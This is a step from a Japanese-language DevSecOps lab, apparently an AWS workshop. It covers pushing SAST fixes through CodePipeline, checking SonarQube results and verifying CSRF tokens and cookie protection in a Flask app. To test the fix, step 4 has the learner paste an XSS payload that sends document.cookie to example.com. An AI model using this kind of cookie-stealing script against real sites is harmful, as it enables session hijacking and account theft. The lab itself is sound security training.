変更の公開と検証

  1. セキュリティ修正を適用したので、AWS Cloud9 のターミナルウィンドウに行って、変更を push しましょう。

    cd ~/environment/flask-app
    git commit -a -m"Fix SAST Findings"
    git push
    
  2. これにより、リリースパイプラインが自動的にトリガーされます。AWS CodePipeline を開き、進行状況を見てください。SAST のステップが成功したら、特定されたすべてのセキュリティリスクを修正できたかどうかSonarQube ダッシュボードを確認しましょう。 sonarqube-clean

  3. CSRF保護を正常に適用したかどうかを確認しましょう。ウェブアプリケーションを開いて、URL /owasp/A2ソースの表示にアクセスしてください。ページが読み込まれるたびに変化する新しい非表示フィールドが表示されます。 csrf-test

  4. 次に、Cookieを保護することができたかどうかを検証しましょう。ウェブアプリケーションを開いて URL /owasp/A2 にアクセスし、攻撃者の資格情報 (ユーザー名: badguy Password: badguy) でログインしてください。これにより、新しいsessionId クッキーが得られるはずです。ログインしたら、/owasp/A7 ページに移動し、次のフォームにこの値を貼り付けます : <script>document.location=' http://example.com/?cookies='+document.cookie</script>。ブラウザはまだリダイレクトしますが、sessionId クッキーがハイジャックされないようにしました。 xss-test

おめでとう!現在、静的アプリケーションセキュリティ分析 (SAST)を通じて得られたすべての自動セキュリティ結果に対処しました。次のモジュールでは、アプリケーションの依存関係の保護に重点を置きます。